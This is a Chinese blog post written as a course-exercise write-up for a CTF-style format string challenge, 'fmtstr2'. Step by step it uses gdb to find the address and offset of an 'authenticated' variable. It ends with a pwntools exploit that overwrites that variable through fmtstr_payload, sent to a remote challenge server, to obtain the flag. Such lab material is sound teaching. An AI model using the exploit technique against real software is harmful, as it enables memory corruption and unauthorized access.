软件安全-课后练习-格式化字符串-fmtstr2-随笔

已于 2023-05-18 21:16:48 修改
阅读量558 收藏
点赞数 1
分类专栏: 软件安全练习题 文章标签: 安全
于 2023-05-18 20:49:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52111404/article/details/130754606
版权

一、准备工作

题目-百度网盘

1.

在这里插入图片描述

2.代码审计

只要输入不是yes或者no,就会调用到存在格式化字符串漏洞的printf函数
在这里插入图片描述
如果authenticated 的值为1195526213(十六进制:0x47424845),就可以得到flag。
在这里插入图片描述

二、思路:

通过格式化字符串覆盖存储authenticated变量的地址对应的内容为1195526213(十六进制:0x47424845)

三、找到存储authenticated变量值的地址

gdb:

b read_flag
r
# 接下来要输入内容,可随便输入

关键的代码在划线的两行,eax+0x48的值即为存储authenticated变量值的地址
在这里插入图片描述
gdb

ni
ni
ni
ni
ni
ni
ni
ni
p $eax + 0x48

得到存储authenticated变量值的地址:
在这里插入图片描述

四、获得格式化字符串的offset

不理解的话可以看这两篇:
最基础的格式化字符串的原理
通过一道例题

1.让程序执行到call printf

gdb:

b printf
r
# 接下来要输入内容,可随便输入

在这里插入图片描述
返回地址如划线处
gdb:

disas  0x8049560

在这里插入图片描述

d
 b *0x804955b
 r
 # 接下来输入内容,可输入一些比较有特征的数字,这里以AAAABBBBCCCCDDDD为例
 stack 20

2.确定offset

在这里插入图片描述
从第一处划线位置为1开始往下数,第二处划线为11,因此offset为11

五、构造payload

from pwn import *
# context.log_level = "DEBUG"
ifRemote = 1
if ifRemote:
    io = remote("8.134.59.72", 38728)
else:
    io = process("./fmtstr2")
authenticated_addr = 0x0804c048
authenticated_value = 0x47424845
offset = 11
# payload = b'%66c%22$hhn%3c%23$hhn%2c%24$hhn%1c%25$hhnaaaJ\xc0\x04\x08H\xc0\x04\x08K\xc0\x04\x08I\xc0\x04\x08'
payload=fmtstr_payload(offset,{authenticated_addr:authenticated_value})
print(payload)
io.sendline(payload)
io.interactive()
irontys
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
格式化字符串漏洞
ylcangel的专栏
10-30 2876
格式化字符串漏洞 github地址:https://github.com/ylcangel/exploits/tree/master/fmtstr 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32 位 内核版本:Linux 2.6.32-754.10.1.el6.i686...
格式化字符串
m0_49959202的博客
10-29 749
文章目录格式化字符串1.原理1.1 格式化字符串介绍1.1.1 格式化字符串函数1.1.2 格式化字符串1.1.3 参数1.2 32位格式化字符串漏洞基本原理1.3 32位格式化字符串利用思路1.3.1 利用1:程序崩溃1.3.2 利用2:泄露内存1.3.2.1 泄露栈内存1.3.2.1.1 获取栈变量数值1.3.2.1.2 获取栈变量对应字符串1.3.2.2 泄露任意地址内存1.3.3 利用3:覆盖内存1.3.3.1 覆盖栈内存1.3.3.2 覆盖任意地址内存1.3.3.2.1 覆盖为小数字1.3.3.3
pwn入门--格式化字符串
yjh_fnu_ltn的博客
07-11 537
gdb中格式化字符串在栈上的位置的,就是偏移。
CTF-Wiki pwn fmtstr(格式化字符串漏洞)
mumuzi的博客
07-24 920
https://www.yinxiang.com/everhub/note/f07ff198-5072-4014-b110-21fb833affee –原理 –格式化字符串 –程序崩溃 –泄漏内存 –泄漏栈内存 –泄漏任意地址内存:覆盖小数字、覆盖大数字 –例题1:x64格式化字符串漏洞 –例题2:hijack GOT 劫持GOT表 –例题3:hijack retaddr 劫持返回地址 –盲打 笔记若存在逻辑问题或者原则性问题,恳请在评论区指正,谢谢观看笔记的师傅。之后会出一期萌新常见的问题(主要只是为了自
[CTF]PWN--手搓格式化字符串漏洞
2301_79880752的博客
02-19 1107
而是,原来我们修改了的其实是0x7f1与0x7f2里的东西,那后面我们就需要修改0x7f3与0x7f4里的东西,因此我们+2的意思就是将原来的0x7f1+2,修改成0x7f3,这样,我们在修改的时候改的就是0x7f3与0x7f4里的东西了(思路是这样的,一个栈地址一共八个字节,我们需要将要修改的地址和被修改的地址每两个字节对应的修改,直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的,由于栈里面的地址与libc里面的地址一般都只占6个字节,因此,我们只需要进行三次修改即可。
[CTF]-PWN:格式化字符串漏洞题综合解析
2301_79326813的博客
08-04 1070
格式化字符串漏洞,可以修改printf的got表内地址为system,传参getshell解法一:在32位中可以使用fmtstr_payload直接修改,免去很多麻烦这个没啥好讲的,只是这个函数64位几乎用不了。解法二:在这个方法中没有使用fmtstr_payload函数,虽然麻烦一点,但必须掌握。先回顾一下知识点在32位中,libc函数的真实地址共有32位(8位一个字节),其中前8位对于所有libc函数来说都是相同的,后24位不同。
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6596
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 910
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
跟着CTF-Wiki学pwn|格式化字符串(1)
Kni9hT's Blog
05-19 2218
文章目录格式化字符串漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符串漏洞原理格式化字符串漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符串漏洞原理介绍 首先,对格式化字符串漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 354
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 764
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
海外直播对网速、带宽、安全的要求
TIANGEKUAJING的博客
09-03 476
要满足海外直播的要求,需要拥有合适的网络配置。在全球化的浪潮下,海外直播正逐渐成为企业、个人和各类组织的重要工具。不论是用于市场推广、品牌宣传,还是与观众互动,海外直播都为参与者带来了丰富的机会。然而,确保高质量的直播效果,必须满足特定的网络条件。
【看雪-注册安全分析报告】
09-05 1425
看雪学苑(www.kanxue.com)是一个专注于PC、移动、智能设备安全研究及逆向工程的安全综合服务网站!创建于2000年,历经20多年的发展,看雪网站形成了大量有价值的技术资料,经过看雪团队的共同努力,先后出版过数本技术专著,深受出版社和广大读者好评,社会影响深远,在行业中树立了令人尊敬的专业形象。平台为会员提供安全知识的在线课程教学,同时为企业提供智能设备安全相关产品和服务。
注册安全分析报告:央视网
Explinks的博客
09-03 825
央视网作为中央广播电视总台主办的中央重点新闻网站和国家级互联网视频综合传播服务平台, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。
高端控制台使用过程中如何保证用电安全
JiaDeLi_console的博客
09-03 636
因此,在使用过程中,采取有效措施确保用电安全,不仅关乎设备寿命,更直接关系到人身安全及数据安全。同时,增强员工的安全意识,让每个人都成为用电安全的守护者,共同营造一个安全、稳定的工作环境。在高端控制台的使用过程中,可以引入智能监控系统,实时监测电力参数、环境温度等关键指标,一旦发现异常立即报警,为及时处理问题提供有力支持。总之,高端控制台使用过程中的用电安全是一项系统工程,需要从电源布局、设备选型、日常维护、人员培训以及智能监控等多个方面入手,全方位、多角度地确保用电安全,为设备的稳定运行保驾护航。
高压喷雾车的功能与应用_鼎跃安全
最新发布
ShenZhenDingYue的博客
09-05 446
在灭火行动中,高压喷雾车的高效作业能成功阻止了火势蔓延,还能保护救援人们群众的财产安全,极大缩短了灭火时间,减少了火灾损失。高压喷雾车不仅在森林灭火中发挥不可替代的作用,其还能在山地、复杂地形和火势迅速蔓延的情况下,保护生命财产安全。在一次森林火灾中,位于山区的一个小型度假村附近突然起火,由于山风强劲,火势迅速蔓延,消防部门立即调派多辆高压喷雾车赶往现场。由于高压喷雾车产生的细水雾可以迅速蒸发吸热,有效降低火场温度,同时水雾还能将空气中的烟雾和有害气体迅速沉降,保护了周围的生态环境和救援人员的安全
在线式环氧乙烷检测仪:现代工业生产中的环氧乙烷安全监测
iotsensor的博客
09-03 669
通过精确、可靠的监测,这些设备能够及时发现并预警环氧乙烷的泄漏风险,有效避免火灾、爆炸等安全事故的发生,从而保障生产环境的安全与员工的健康。:ETO-B1电化学传感器具有灵敏度高,选择性好,可以过滤灰尘和小水滴,低浓度输出线性好,稳定性好,7系大小,抗H2、NH3、CO2、CL2的干扰等优点,量程为0~100ppm,工作环境为-30~50℃,15~90%RH,分辨率为0.1ppm,主要用在石油,化工,检测工业环境中的VOC气体。因此,对于环氧乙烷的安全管理,必须采取严格的监测措施。
低代码平台中的统一认证与单点登录(SSO):实现简化与安全的用户管理
CC_longhua的博客
09-04 1376
低代码平台是一种允许用户通过图形化界面而非编写大量代码来构建应用程序的工具。这种平台的优势在于能够大幅度缩短开发周期、降低开发成本,并使得非技术人员也能参与到应用开发中。常见的低代码平台有OutSystems、Mendix、Appian等。统一认证是指通过一个中央系统进行用户身份验证的过程。用户只需在中央认证系统中进行一次身份验证,即可访问多个应用程序或服务。这种方式不仅提升了用户体验,还简化了后台的用户管理。对于有特殊需求的企业,低代码平台通常允许用户通过自定义代码来实现更复杂的认证逻辑。
go语言如何格式化字符串
06-06
在 Go 语言中,您可以使用 `fmt.Sprintf()` 函数来格式化字符串。这个函数的用法和 C 语言中的 `printf()` 函数非常类似,不同之处是 `fmt.Sprintf()` 函数并不直接将结果输出到屏幕上,而是将结果作为字符串返回。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值